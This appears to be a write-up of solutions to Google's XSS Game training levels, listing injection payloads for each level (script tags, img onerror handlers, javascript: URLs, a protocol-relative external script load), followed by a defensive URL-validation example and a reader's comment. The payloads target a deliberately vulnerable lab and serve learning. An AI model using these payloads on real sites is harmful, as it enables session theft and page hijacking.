- Google XSS Challenges at https://xss-game.appspot.com
- Help : https://www.google.com/about/appsecurity/learning/xss/index.html
The output will be directly displayed without any escaping.
A simple query with <script>alert("XSS")</script> will do the job.
Script blocks are not allowed.
Post content : <img src='aaaaaaa' onerror=alert("XSS")>
Make sure that aaaaaaa is not a valid image.
The only thing we can do is use the URL as the attack vector.
A few tests later, we see that the section after the '#' is placed
in an img block. Same JS trick as Level 2.
URL : https://xss-game.appspot.com/level3/frame#1' onerror='alert("XSS")
Other solutions:
https://xss-game.appspot.com/level3/frame#1'><script>alert("XSS")</script>
https://xss-game.appspot.com/level3/frame#1.jpg' onload=alert("XSS")>
The input will be displayed but will be escaped.
However, the input is also used in the img section which displays the loading animation.
Query : 1";alert("XSS
URL : https://xss-game.appspot.com/level4/frame?timer=1';alert('XSS
The next field in the URL represents the name of the function call on submit.
Just put javascript:alert("XSS") into the next value.
URL : https://xss-game.appspot.com/level5/frame/signup?next=javascript%3Aalert%28%27XSS%27%29
(fourth hint really useful)
Here we can't insert code but we can ask to load a library from Google JSAPI for instance.
URL : https://xss-game.appspot.com/level6/frame#//google.com/jsapi?callback=alert
If we try with a complete URL such as htt://google.com/jsapi?callback=alert, strange things happen. I'm sure there might be a way without any API but I didn't find it yet.
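The last two levels both come down to trusting a URL taken from the request: the next value accepts a javascript: scheme, and the fragment-driven loader accepts a protocol-relative //host path. As an added example (not part of the original write-up or of the game's code), here is one way to validate such a value by parsing it and checking scheme and origin; the base URL, the allowlist and the naive prefix filter are assumptions made for the demonstration.

```javascript
// Added example. BASE and ALLOWED_ORIGINS are assumptions for this demo.
const BASE = "https://xss-game.appspot.com/level6/frame";
const ALLOWED_ORIGINS = new Set(["https://xss-game.appspot.com"]);

// Resolve an untrusted URL the way a browser would, then decide on the
// parsed result. Returns the normalized URL string, or null if rejected.
function resolveIfAllowed(untrusted, base = BASE, allowed = ALLOWED_ORIGINS) {
  let url;
  try {
    // Handles relative paths and protocol-relative "//host/path" forms,
    // lowercases the scheme and strips leading whitespace.
    url = new URL(untrusted, base);
  } catch {
    return null; // unparsable input is rejected, never passed through
  }
  // Scheme check on the parsed value: javascript:, data:, http: fail here.
  if (url.protocol !== "https:") return null;
  // Origin check: "//other.host/x" inherits https: from the base but
  // resolves to a different origin, so it is rejected.
  if (!allowed.has(url.origin)) return null;
  return url.href;
}

// Hypothetical weak filter for comparison: it inspects the raw string
// prefix only, so anything that does not start with http(s):// passes.
function naivePrefixCheck(untrusted) {
  return !/^https?:\/\//i.test(untrusted);
}

// Inputs taken from the write-up above, plus a same-origin path (constructed).
const samples = [
  "javascript:alert('XSS')",
  "//google.com/jsapi?callback=alert",
  "/static/gadget.js",
];
for (const s of samples) {
  console.log(JSON.stringify(s), "naive:", naivePrefixCheck(s),
              "parsed:", resolveIfAllowed(s));
}
```

The same function fits a redirect target such as next and a script src: in both cases the decision is made on the parsed URL, not on the raw string.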
Hi, when I try to access level 2 I see the following message:
Based on your browser cookies it seems like you haven't passed the previous level of the game. Please go back to the previous level and complete the challenge.
Does anybody have the same problem?